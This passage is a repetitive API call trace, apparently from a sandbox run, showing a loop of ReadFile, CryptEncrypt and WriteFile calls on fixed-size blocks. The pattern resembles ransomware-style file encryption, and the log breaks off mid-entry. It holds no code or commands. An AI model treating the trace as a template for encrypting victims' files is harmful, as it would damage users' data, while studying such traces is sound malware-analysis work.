[0261.979] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.979] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.979] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.979] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.979] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.980] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.980] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.981] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.981] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.981] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.981] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.982] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.982] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.983] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.984] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.984] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.984] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.984] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.984] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.985] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.985] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.985] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.985] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.985] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.985] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.986] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.987] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.988] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 